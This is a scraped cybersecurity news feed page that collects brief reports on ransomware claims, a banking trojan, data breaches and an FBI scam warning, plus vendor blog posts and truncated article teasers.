Normal view
Identity Crime Reports Drop 16% Annually but Job Scams Surge
Buying a VPN? Here’s what to know and look for
-
Cybersecurity News and Magazine
- BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Targets Better Business Bureau, US Dermatology Partners
BianLian Ransomware Attack: Critical Details
The first organization targeted by hackers was Better Business Bureau (BBB), which is a private, nonprofit organization founded in 1912 in Arlington, Virginia. The firm maintains a massive database of accredited and non-accredited businesses, providing ratings based on several factors. The Better Business Bureau has a revenue of $430.6 Million. [caption id="attachment_79001" align="alignnone" width="1259"]![BianLian Ransomware Attack](../themes/icons/grey.gif)
![BianLian Ransomware Attack](../themes/icons/grey.gif)
Potential Impact of BianLian Ransomware Attack
If proven, the potential consequences of this ransomware attack could be critical as the accounting and financial details of both these firms could be leaked. The organizations should take appropriate measures to protect the privacy and security of the stakeholders involved. Financial data breaches can lead to identity theft, financial fraud, and a loss of trust among clients, potentially jeopardizing the company’s standing in the industry. Currently, details regarding the extent of the BianLian ransomware attack, data compromise, and the motive behind the cyber assault remain undisclosed. Despite the claims made by BianLian, the official websites of the targeted companies remain fully functional. This discrepancy has raised doubts about the authenticity of the BianLian group’s assertion. To ascertain the veracity of the claims, The Cyber Express has reached out to the officials of the affected organizations. As of the writing of this news report, no response has been received, leaving the ransomware attack claim unverified.History of BianLian Ransomware Group Attacks
BianLian, a ransomware group, has been targeting critical infrastructure sectors in the U.S. and Australia since June 2022. They exploit RDP credentials, use open-source tools for discovery, and extort data via FTP or Rclone. FBI, CISA, and ACSC advise implementing mitigation strategies to prevent ransomware attacks. Initially employing a double-extortion model, they shifted to exfiltration-based extortion by 2023. According to a report by BlackBerry, BianLian ransomware showcases exceptional encryption speed and is coded in the Go programming language (Golang). This sophisticated approach has enabled the group to strike multiple organizations, leaving a trail of unverified claims in its wake. Earlier in 2024, the group targeted companies such as North Star Tax and Accounting, KC Pharmaceuticals, Martinaire. In its attack on MOOver, the group claimed to have accessed a staggering 1.1 terabytes of the firm’s data. Subsequently, Northeast Spine and Sports Medicine also found themselves on the list of victims. All these claims, similar to the recent attack, remain unverified. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.-
CISO2CISO.COM & CYBER SECURITY GROUP
- US DHS Warns of AI-Fueled Chemical and Biological Threats – Source: www.databreachtoday.com
US DHS Warns of AI-Fueled Chemical and Biological Threats – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Cyberwarfare / Nation-State Attacks , Fraud Management & Cybercrime New Report Urges Public-Private Collaboration to Reduce Chemical, Nuclear AI Risks Chris Riotta (@chrisriotta) • June 25, 2024 The U.S. federal government warned that artificial intelligence lowers the barriers to conceptualizing and conducting […]
La entrada US DHS Warns of AI-Fueled Chemical and Biological Threats – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Patched Weeks Ago, RCE Bug in AI Tool Still a ‘Probllama’ – Source: www.databreachtoday.com
Patched Weeks Ago, RCE Bug in AI Tool Still a ‘Probllama’ – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Artificial Intelligence & Machine Learning , Governance & Risk Management , Next-Generation Technologies & Secure Development Companies Eager for Tools Are Putting AI’s Transformative Power Ahead of Security Rashmi Ramesh (rashmiramesh_) • June 25, 2024 Oh, no – not all Ollama administrators have patched against the “Probllama” flaw. […]
La entrada Patched Weeks Ago, RCE Bug in AI Tool Still a ‘Probllama’ – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Why New Cyber Penalties May Strain Hospital Resources – Source: www.databreachtoday.com
Why New Cyber Penalties May Strain Hospital Resources – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Healthcare , Industry Specific , Standards, Regulations & Compliance John Riggi of the American Hospital Association on HHS’ Upcoming Cyber Regulations Marianne Kolbasuk McGee (HealthInfoSec) • June 25, 2024 John Riggi, national cybersecurity and risk adviser, American Hospital Association White House efforts to ratchet up healthcare sector cybersecurity […]
La entrada Why New Cyber Penalties May Strain Hospital Resources – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Luxury Retailer Neiman Marcus Suffers Snowflake Breach – Source: www.databreachtoday.com
Luxury Retailer Neiman Marcus Suffers Snowflake Breach – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 3rd Party Risk Management , Cybercrime , Fraud Management & Cybercrime More Victims of Campaign Against Data Warehousing Platform Snowflake Come to Light Mathew J. Schwartz (euroinfosec) • June 25, 2024 Attention Neiman Marcus shoppers: Your contact information may be for sale on a criminal forum. (Image: Shutterstock) […]
La entrada Luxury Retailer Neiman Marcus Suffers Snowflake Breach – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Securing Data With Immutable Backups and Automated Recovery – Source: www.databreachtoday.com
Securing Data With Immutable Backups and Automated Recovery – Source: www.databreachtoday.com
Source: www.databreachtoday.com – Author: 1 Immutable backups are essential in the fight against ransomware, and businesses should put protections in place to ensure attackers can’t alter or delete them. Acronis President Gaidar Magdanurov said data protection firms must address the threat of ransomware by implementing immutable storage and exposing APIs for seamless integration with security […]
La entrada Securing Data With Immutable Backups and Automated Recovery – Source: www.databreachtoday.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Malwarebytes Premium stops 100% of malware during AV Lab test
Malwarebytes Premium has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”
For its performance in the May 2024 evaluation, Malwarebytes Premium also received a certificate of “Excellence.”
According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”
Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.
For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.
Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.
![](../themes/icons/grey.gif)
![](../themes/icons/grey.gif)
To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:
- Collecting and verifying in-the-wild malware: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.
- Simulating a real-world scenario in testing: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.
- Incident recovery time assessment: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”
Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.
Dark Web Actors Reveals New Banking Trojan Sniffthem
Dark Web Actors Reveals Banking Trojan Sniffthem
[caption id="attachment_78990" align="alignnone" width="1906"]![Banking Trojan Sniffthem](../themes/icons/grey.gif)
Technical Insights into Sniffthem Banking Trojan
Sniffthem's technical specifications highlight its sophistication and potential impact on cybersecurity. The Sniffthem banking trojan operates persistently as a hidden process, evading detection and maintaining a covert presence on infected systems. Its integration with a web-based management panel allows threat actors to efficiently control compromised devices and orchestrate malicious activities remotely. Furthermore, Sniffthem's compatibility with a wide array of browsers—64 in total—highlights its versatility and ability to infiltrate diverse user environments. This capability extends its reach across various sectors, with a particular focus on the BFSI (Banking, Financial Services, and Insurance) industry where financial transactions and sensitive data are prime targets. The emergence of Sniffthem signifies a heightened threat to organizations and individuals alike, particularly within the financial sector. To mitigate risks associated with banking trojans like Sniffthem, cybersecurity best practices are essential. Organizations should prioritize regular software updates, endpoint protection, and employee training to recognize and respond to phishing attempts effectively. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.-
Cybersecurity News and Magazine
- BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
BSNL Data Breached Yet Again? Millions of Users Face Risk of SIM Card Cloning, Financial Fraud
Exploring Claims of BSNL Data Breach
The BSNL data leak was first disclosed by an Indian firm, Athenian Tech, in its threat intelligence report. According to the report, a threat actor, operating under the alias “kiberphant0m”, leaked a significant amount of sensitive data affecting millions of users. The threat actor posted this information on the data hack site BreachForums and shared samples of the breach to legitimize the claim. Overall, around 278GB of sensitive information could be compromised.![BSNL Data Breach](../themes/icons/grey.gif)
![BSNL Data Hacked](../themes/icons/grey.gif)
Potential Implications of BSNL Data Breach
- SIM Cloning and Identity Theft: Cloning a SIM involves creating a duplicate card that has the same IMSI and authentication keys, thus making it easy for the attackers to intercept messages/ calls, gain access to people’s bank accounts, and embezzle their finances.
- Privacy Violations: Identity theft means that one can gain unauthorized access to the individuals’ communication and breaches.
- Financial and Identity Theft: Illegal operations can defeat protective procedures in the financial portfolios, which entail substantial monetary losses and cases of identity theft.
- Targeted Attacks and Scams: The user could be exposed to major security risks and could be vulnerable to phishing schemes and other social engineering attacks, exploiting their trust in BSNL.
Second BSNL Data Breach in Less Than Six Months
If the data theft claims are proven, it would be the second instance of a cyberattack on BSNL in less than six months. In December 2023, a threat actor known as “Perell” claimed access to critical information about fiber and landline users of BSNL. The dataset contained about 32,000 lines of data allegedly impacting over 2.9 million users. However, BSNL did not validate the claims back then. Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.The US Is Banning Kaspersky
This move has been coming for a long time.
The Biden administration on Thursday said it’s banning the company from selling its products to new US-based customers starting on July 20, with the company only allowed to provide software updates to existing customers through September 29. The ban—the first such action under authorities given to the Commerce Department in 2019—follows years of warnings from the US intelligence community about Kaspersky being a national security threat because Moscow could allegedly commandeer its all-seeing antivirus software to spy on its customers.
'ChamelGang' APT Disguises Espionage Activities With Ransomware
Siemens Sicam Vulnerabilities Could Facilitate Attacks on Energy Sector
Several vulnerabilities patched recently in Siemens Sicam products could be exploited in attacks aimed at the energy sector.
The post Siemens Sicam Vulnerabilities Could Facilitate Attacks on Energy Sector appeared first on SecurityWeek.
Exploitation Attempts Target New MOVEit Transfer Vulnerability
Exploitation attempts targeting CVE-2024-5806, a critical MOVEit Transfer vulnerability patched recently, have started.
The post Exploitation Attempts Target New MOVEit Transfer Vulnerability appeared first on SecurityWeek.
FireTail Unveils Free Access for All to Cutting-Edge API Security Platform
![](../themes/icons/grey.gif)
McLean, United States of America, 26th June 2024, CyberNewsWire
The post FireTail Unveils Free Access for All to Cutting-Edge API Security Platform appeared first on Security Boulevard.
-
Security Boulevard
- Stepping Into the Attacker’s Shoes: The Strategic Power of Red Teaming (Insights from the Field)
Stepping Into the Attacker’s Shoes: The Strategic Power of Red Teaming (Insights from the Field)
![red teaming, red, security, SOCs](../themes/icons/grey.gif)
Red Teaming security assessments aim to demonstrate to clients how attackers in the real world might link together various exploits and attack methods to reach their objectives.
The post Stepping Into the Attacker’s Shoes: The Strategic Power of Red Teaming (Insights from the Field) appeared first on Security Boulevard.
EU Opens the App Store Gates: A Call to Arms for MDM Implementation
![app, sideloading, MDM, Apple, IoS, SEC SIM swap X account](../themes/icons/grey.gif)
By introducing a mobile device management (MDM) platform into the existing infrastructure, administrators gain the ability to restrict sideloading on managed devices.
The post EU Opens the App Store Gates: A Call to Arms for MDM Implementation appeared first on Security Boulevard.
Understanding and Mitigating Jump Server Security Risks
Many organizations today use a jump server (also known as jump box or jump host) as the intermediary device to access a remote network securely. It is the go-to solution for remote administration of servers and devices and for development and testing environments. It is also commonly used to control vendor access to an organization’s internal systems and to meet compliance in certain industries.
While this is definitely a step up in security from using VPNs, jump server can sometimes create a false sense of security because there still exists security risks and loopholes.
In this blog post, we will first explore the security benefits and risks of a jump server. Finally, we will unveil strategies to mitigate those security risks.
TABLE OF CONTENTS
Top 5 Security Benefits of a Jump Server
Top 5 Security Risks of a Jump Server
How to Mitigate Jump Server Security Risks Using Best Practices
Mamori Adds Two Additional Layers of Security to Your Jump Host
Top 5 Security Benefits of a Jump Server
1. Central Access Point for Easy Management
When access is centralized, it is easy monitor and manage who access their network, ensuring all access to protected networks are authorized. Centralized access also simplifies managing permissions and security policies. while also making it easier to monitor and log activities.
2. Easy Monitoring and Session Management
With centralized access, monitoring traffic and logging activities are simplified. Jump servers also allow session recording, session timeout, and the ability terminate sessions to enhance control and security.
3. Reduce Attack Surface from external threats
Jump servers should be isolated from the internet and shouldn’t be able to browse the intranet. This reduces the attack surface and adds a layer of defense against external threats.
4. Reduced Exposure
By limiting direct access to critical systems and databases, jump servers minimize the risk of unauthorized access from any unauthorized sources.
5. Simplifying Audit and Compliance
User activity and traffic passing through the controlled central access point can be logged and recorded, which helps meet regulatory.
Top 5 Security Risks of Jump Server
1. Single Point of Failure
A compromised jump server can jeopardize the entire network. Also, a compromised user account, a privileged user, or an infected device can jeopardize the entire system and database the jump server protects.
2. Setup Complications
A simple jump server contains a Windows Server with RDP and user accounts from Active Directory. Additional setup and tools can be used to create more secure policies. In some cases, coding and debugging is required, which makes it difficult to add additional security policies.
3. Misconfigured Architecture and Database Security
A misconfigured architecture can completely bypass the jump server and access privileged resources, as indicated in the image below with the non-privileged resource. If the non-privileged resource is compromised, then the privileged resource can be accessed, bypassing the jump server. Because privileged resources are usually databases, many mistakenly think that jump server protects the database. Although jump servers do protect database access (in a way), it is NOT database security, as you’ll see later in this article.
Above: Workstation can circumvent access to privileged resources when the security architecture is misconfigured. Image source: Improsec.
4. Outdated Software and Credentials Management
Running outdated software on the jump server is known to expose the jump server to vulnerabilities. Default and weak passwords should be changed, and strong authentication policies should be enforced.
5. Insider Threats and Incident Response
Disgruntled or malicious employees who have access can cause data loss and data breaches. Although all traffic can be monitored, jump servers by default lack the ability immediately respond to insiders who are mass downloading or deleting data.
How to Mitigate Jump Server Security Risks Using Best Practices
Simply put, the easiest and simplest way to mitigate jump server security risks is to implement security best practices on your jump server. However, that is easily said than done.
Here at Mamori.io, we make it extremely easy to implement jump server security best practices (including ransomware prevention and cybersecurity best practices).
Below lists the jump server security best practices and how they mitigate the security risks mentioned earlier.
1. Implement Two-Factor Authentication (2FA)
2FA adds another layer of security even when your password is compromised, or if you’re using default password.
Security Risk Mitigated: Credentials Management, Database Security
Mamori’s Approach: Mamori.io uses a zero-trust approach that assumes your password has already been compromised. Every access is secured by MFA, from accessing the network using Zero Trust Network Access (ZTNA) to accessing the database using our Database Privileged User Access (DB PAM) via SSO. Even certain operations within the database, such as mass deleting data, can be authorized to certain individuals and secured using 2FA.
2. Regular Updates and Patch
Regularly patching and updating the software and operating system on the jump server is the quickest and easiest way to close security gaps against known vulnerabilities and exploits.
Security Risk Mitigated: Outdated Software
Mamori’s Approach: Even if an external threat uses a known vulnerability to compromise your jump server, your critical resources and database can still be protected by database privileged access controls secured by 2FA.
3. Enforce Role-Based Access
Only grant access to those who need access. Enforce role-based access so users have the minimal necessary permissions (least-privileged access). This limits the number of potential attack vectors and reduces insider threats.
Security Risk Mitigated: Setup Complications, Misconfigured Architecture and Database Security, Insider Threats
Mamori’s Approach: Mamori provides Privileged Access Management (PAM) to limit jump server access to only those who need access. Once the user connects to the database or privileged resource, Mamori provides Database Privileged Access Management (DB PAM) to limit the user’s access to resource, his visibility (eg. data masking) and the types of operations (eg. read, write, delete, etc.) the user can perform onto those resources.
4. Ensure Comprehensive Logging and Monitoring
Comprehensive logging and monitoring allow for the detection of suspicious activities and help with IT audits and compliance. Logging and monitoring also facilitates forensic analysis post-incident, enhancing the overall security posture.
Security Risk Mitigated: Insider Threats, Incident Response
Mamori’s Approach: At Mamori, we believe logging and monitoring is NOT comprehensive if users are able to share accounts. That is why we use a zero-trust approach, where the user, device, location, (and more) needs to be authenticated for access and for certain database operations. Thus, when each session is monitored, logged, and recorded, we ensure that each session can easily be traced back and be used as forensics or incident response.
5. Enforce Strong Password Policies
Strong password policies, such as password complexity, regular changes, and restricting reuse, make it harder for attackers to guess or crack passwords. This strengthens the first line of defense against unauthorized access.
Security Risk Mitigated: Credentials Management and weak passwords
Mamori’s Approach: We encourage the use of strong password policies, but we emphasize on Two Factor Authentication (2FA). That’s because we use a zero-trust approach, where we assume every password is already compromised or will be compromised one day.
6. Segmenting the Network
Jump servers should only have access to select servers. One practice is to isolate the jump server from other parts of the network, which limits the potential damage of the jump server is compromised. Segmenting a network prevents attacks from moving laterally across the network to access other critical systems.
Security Risk Mitigated: Setup Complications, Misconfigured Architecture
Mamori’s Approach: Mamori uses Zero Trust Network Access (ZTNA) to microsegment a network. The microsegmented network can then be used for the jump server to ensure an isolated, secure environment.
Mamori Adds Two Additional Layers of Security to Your Jump Host
Layer 1: Securing Access to the Jump Server
Mamori ensures that only the right user with the right permission has access to the jump server using the following modules and features:
Zero Trust Network Access (ZTNA) – Before a user gets connects to the network, the user’s device and identity is verified using 2FA. Other security policies, such as access restrictions by IP address, can also be enforced.
Privileged Access Management (PAM) – Once a user connects onto the network, policies set forth in the PAM module will restrict or allow that user’s access to the jump server.
Layer 2: Securing Access from the Jump Server to Your Databases
After a person connects onto a jump server, the following Mamori modules and features ensure that the person can only view, access, and perform operations that is needed to do his job:
Database Privileged Access Management (DB PAM) – Once a user connects onto a database via a jump server, DB PAM will determine what resources the user has access to and what database operations the user can execute.
SQL Firewall – DB PAM can create rules and privileges on what SQL commands a user can run. You can choose to block all SQL commands or allow specific types of SQL commands.
Data Privacy Policies – You can easily create policies such as data masking policies, who has access to which tables, rows, or columns, and how users can work with those data.
Bonus Layer: Controlling Uploads and Downloads from Jump Server
By default, jump servers do not allow you to control uploads and downloads to and from the jump server. When someone needs to upload or download, admins might choose to share passwords, or create a new account with excess privileges that is to be a forgotten account – both of which introduce considerable security risks.
With Mamori’s PAM features, you can set permissions that allow what user(s) is able to upload, download, or do both from the jump server. Permission include having the user request access on-demand, limit access by IP address, or setting a time frame where the user account is granted access. This is another form of securing access that improves both security and workflow efficiency.
Deploy Both Layers Using a Simple Dashboard with No Coding Required
Unlike the configuring a jump server, using Mamori requires no coding. We offer a simple dashboard and user interface that even the most non-technical users can create security policies that can mitigate the security risks of your jump server.
Conclusion
By understanding the benefits and addressing the risks associated with jump servers, you can enhance the security of your network while maintaining efficient, controlled, and secure access to critical systems. If you have further questions or need assistance in securing your jump server, feel free to reach out for a detailed consultation.
Schedule a demo with Mamori.io or request your free trial. If you’re a small business with fewer than 20 users, you can use Mamori.io for free.
The post Understanding and Mitigating Jump Server Security Risks appeared first on Security Boulevard.
Efficiency is Key to Cybersecurity in the Post-Cloud Era
SANTA CLARA, Calif., June 26, 2024 — At the 16th Information Security Forum and 2024 RSAC Hot Topics Seminar held on June 7, 2024, Richard Zhao, Chief Operating Officer of International Business at NSFOCUS, presented the new picture of cybersecurity in the post-cloud era with his professional insights. Key Highlights Richard’s speech focused on three […]
The post Efficiency is Key to Cybersecurity in the Post-Cloud Era appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..
The post Efficiency is Key to Cybersecurity in the Post-Cloud Era appeared first on Security Boulevard.
Snowflake Breach
Snowflakes has become the latest corporate victim in a cyberattack but how it is playing out is a little different than many breaches.
The post Snowflake Breach appeared first on Security Boulevard.
Proxies as a Service: How to Identify Proxy Providers via Bots as a Service
See how DataDome learns about proxy networks from bots as a service, how BaaS can be detected, and what kind of IP addresses are behind BaaS.
The post Proxies as a Service: How to Identify Proxy Providers via Bots as a Service appeared first on Security Boulevard.
Chinese and N. Korean Hackers Target Global Infrastructure with Ransomware
Practical Guidance For Securing Your Software Supply Chain
Fake Law Firms Con Victims of Crypto Scams, Warns FBI
Apple Patches AirPods Bluetooth Vulnerability That Could Allow Eavesdropping
New Credit Card Skimmer Targets WordPress, Magento, and OpenCart Sites
New Medusa Android Trojan Targets Banking Users Across 7 Countries
-
Cybersecurity News and Magazine
- AzzaSec Reveals Advanced Windows Ransomware Builder, Threatens Cybersecurity
AzzaSec Reveals Advanced Windows Ransomware Builder, Threatens Cybersecurity
AzzaSec Announces New Windows Ransomware Builder
[caption id="attachment_78968" align="alignnone" width="373"]![AzzaSec Announces New Windows Ransomware Builder](../themes/icons/grey.gif)
Features and Functionality of the Windows Ransomware Builder
In their Telegram post, AzzaSec described their ransomware's capabilities in detail. Developed with VB.NET and weighing 10MB, the ransomware utilizes a unique algorithm for encryption. It operates with a fully undetectable structure, boasting a detection rate of only 1 out of 40 on KleenScan. Tested against various security solutions including Windows Defender, Avast, Kaspersky, and AVG, AzzaSec ensures its malware's effectiveness in compromising systems. The ransomware functions by connecting to a C2 server, where decryption keys and device information are stored. This approach allows the threat actors to monitor and control the ransomware's impact remotely. Furthermore, the ransomware includes anti-virtual machine, anti-debugging, and anti-sandbox features, making it resilient against common security countermeasures. AzzaSec also outlined its pricing strategy: $300 for a single-use stub, escalating to $4500 for a six-month subscription. For those seeking full control, the source code is available for $8000, enabling other threat actors to customize and deploy the ransomware independently. AzzaSec's emergence into the ransomware scene signals a reminder for organizations and individuals alike to upgrade their cybersecurity measures and remain vigilant against online threats. As ransomware-as-a-service models become more accessible, preemptive cybersecurity measures and incident response plans are essential defenses against these ever-present dangers.Don’t Fall for Fake Recovery: FBI Warns of Cryptocurrency Scam
Cryptocurrency Scam: Emerging Criminal Tactic
The FBI's announcement aims to inform the public about a new criminal tactic designed to exploit cryptocurrency scam victims further. Using social media and other messaging platforms, fraudsters posing as lawyers from fictitious law firms are contacting scam victims and offering their services. These "lawyers" claim they have the authority to investigate fund recovery cases and often assert that they are working with, or have received information from, the FBI, Consumer Financial Protection Bureau (CFPB), or other government agencies to validate their legitimacy. In some instances, victims have reached out to these scammers through fake websites that appear legitimate, hoping to recover their lost funds. The scammers use various methods to further the recovery scam, including:- Verification Requests: They ask victims to verify their identities by providing personal identifying information or banking details.
- Judgment Amount Requests: They request that victims provide a judgment amount they are seeking from the initial fraudster.
- Upfront Fees: They demand a portion of the fees upfront, with the balance due upon recovery of the funds.
- Additional Payments: They direct victims to make payments for back taxes and other fees purportedly necessary to recover their funds.
- Credibility Building: They reference actual financial institutions and money exchanges to build credibility and further their schemes.
Tips to Protect Yourself
The FBI offers several tips to help individuals protect themselves from falling victim to these scams:- Be Wary of Advertisements: Be cautious of advertisements for cryptocurrency recovery services. Research the advertised company thoroughly and be suspicious if the company uses vague language, has a minimal online presence, and makes unrealistic promises about its ability to recover funds.
- Do Not Release Information: If an unknown individual contacts you claiming to be able to recover stolen cryptocurrency, do not release any financial or personal identifying information, and do not send money.
- No Fees from Law Enforcement: Remember that law enforcement does not charge victims a fee for investigating crimes. If someone claims an affiliation with the FBI, contact your local FBI field office to confirm their legitimacy.
Victim Reporting
The FBI urges victims to file a report with the Internet Crime Complaint Center. When filing a report, try to include the following information:- Contact Information: Details about how the individual initially contacted you and how they identified themselves, including name, phone number, address, email address, and username.
- Financial Transaction Information: Details such as the date, type of payment, amount, account numbers involved (including cryptocurrency addresses), name and address of the receiving financial institution, and receiving cryptocurrency addresses.
-
Cybersecurity News and Magazine
- Cyble Recognized in Attack Surface Management Solutions Landscape Report
Cyble Recognized in Attack Surface Management Solutions Landscape Report
Key Capabilities of Cyble Vision X include:
- Attack Surface Management: Ensures digital security by identifying and mitigating threats.
- Brand Intelligence: Comprehensive protection against online brand abuse, including brand impersonation, phishing, and fraudulent domains.
- Cyber Threat Intelligence: Helps organizations gain insights and enhance their defense with AI-driven analysis and continuous threat monitoring.
- Dark Web and Cyber Crime Monitoring: Helps organizations stay vigilant and ahead of cybercriminals
- Third-Party Risk Management (TPRM): Helps organizations identify, assess, and mitigate risks that may arise from a business's interactions with third parties.
-
Cybersecurity News and Magazine
- Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Alerts Customers After Data Breach Exposes Information of 64,472 Individuals
Neiman Marcus Data Breach Confirmed
The Neiman Marcus data breach compromised a range of personal data, including customer names, contact details, dates of birth, and Neiman Marcus gift card numbers. "Based on our investigation, the unauthorized party obtained certain personal information stored in the platform," the spokesperson continued, clarifying that "The types of personal information affected varied by individual, and included information such as name, contact information, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers (but without gift card PINs)." Neiman Marcus has acted swiftly, launching an investigation with leading cybersecurity experts and notifying law enforcement authorities. In compliance with regulatory requirements, the company has begun notifying affected customers, including reaching out to the Maine Attorney General's office. The retailer has advised customers to monitor their financial statements for any suspicious activity and has provided resources for individuals concerned about identity theft.Mitigation Against the Neiman Marcus Data Leak
"We also began an investigation with assistance from leading cybersecurity experts and notified law enforcement authorities," the spokesperson emphasized. Customers are encouraged to request free credit reports, report any suspected fraud to law enforcement and the Federal Trade Commission, and consider placing a security freeze on their credit files as precautionary measures. Neiman Marcus Group, Inc., based in Dallas, Texas, is a popular luxury retailer that oversees brands such as Neiman Marcus, Bergdorf Goodman, Horchow, and Last Call. Since September 2021, it has been under the ownership of a consortium of investment firms led by Davidson Kempner Capital Management, Sixth Street Partners, and Pacific Investment Management. Following this Neiman Marcus data leak, the firm has established a dedicated toll-free hotline (1-885-889-2743) for affected customers seeking further information or assistance related to the data breach incident.Over 110,000 Websites Affected by Hijacked Polyfill Supply Chain Attack
-
SANS ISC InfoSec News Feed
- ISC Stormcast For Wednesday, June 26th, 2024 https://isc.sans.edu/podcastdetail/9036, (Wed, Jun 26th)
ISC Stormcast For Wednesday, June 26th, 2024 https://isc.sans.edu/podcastdetail/9036, (Wed, Jun 26th)
Risk and Privacy FREE BOOK
The importance of businesses being ‘operationally resilient’ is becoming increasingly important, and a driving force behind whether an organization can ensure that its valuable business operations can ‘bounce back’ from or manage to evade impactful occurrences is its security risk management capabilities.In this book, we change the perspective on an organization’s operational resilience capabilities so […]
La entrada Risk and Privacy FREE BOOK se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Risk Framework Body Related Data (PD) Immersive Tech
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team. Username or E-mail Password Remember Me Forgot Password
La entrada Risk Framework Body Related Data (PD) Immersive Tech se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- CYBERSECURITY Improvements Needed in Addressing Risks to Operational Technology
CYBERSECURITY Improvements Needed in Addressing Risks to Operational Technology
The National Institute of Standards and Technology (NIST) describes OT as a broad range of programmable systems and devices that interact with the physical environment (or manage devices that interact with the physical environment).13 These systems and devices detect or cause a direct change through monitoring and/or control of devices, processes, and events. Figure 1 […]
La entrada CYBERSECURITY Improvements Needed in Addressing Risks to Operational Technology se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
Remote ID Proofing Good Practices
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team.
La entrada Remote ID Proofing Good Practices se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
RedTeam Tips Orchestrating Chaos Evading Defense Culture
Red Teaming involves simulating cyberattacks to test an organization’s defenses. Red Teams adopt the mindset of adversaries, aiming to uncover vulnerabilities and assess the effectiveness of defensive measures. This practice is crucial in improving an organization’s security posture and resilience against real-world attacks. Key Strategies for Orchestrating Chaos and Evading Defense: Developing a Red Team […]
La entrada RedTeam Tips Orchestrating Chaos Evading Defense Culture se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Why Red TeamsPlay a Central Rolein Helping OrganizationsSecure AI Systems
Why Red TeamsPlay a Central Rolein Helping OrganizationsSecure AI Systems
The content you are trying to access is private only to member users of the site. You must have a free membership at CISO2CISO.COM to access this content. You can register for free. Thank you. The CISO2CISO Advisors Team.
La entrada Why Red TeamsPlay a Central Rolein Helping OrganizationsSecure AI Systems se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
CISO2CISO.COM & CYBER SECURITY GROUP
- Red Report 2024 – The Top 10 Most Prevalent MITRE ATT&CK® Techniques The Rise of Hunter-Killer Malware
Red Report 2024 – The Top 10 Most Prevalent MITRE ATT&CK® Techniques The Rise of Hunter-Killer Malware
Marking its fourth year of publication, the Red Report 2024™ provides a critical dive into the evolving threat landscape, presenting a detailed analysis of adversaries’ most prevalent tactics, techniques, and procedures (TTPs) used throughout the past year. Conducted byPicus Labs, this annual study examines over 600,000 malware samples and assesses more than 7 million instances […]
La entrada Red Report 2024 – The Top 10 Most Prevalent MITRE ATT&CK® Techniques The Rise of Hunter-Killer Malware se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.
-
Cybersecurity News and Magazine
- Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Cyber Attack Forces South Africa’s National Health Laboratory Service To Shut Down Systems
Impact on South Africa's National Health Laboratory Service
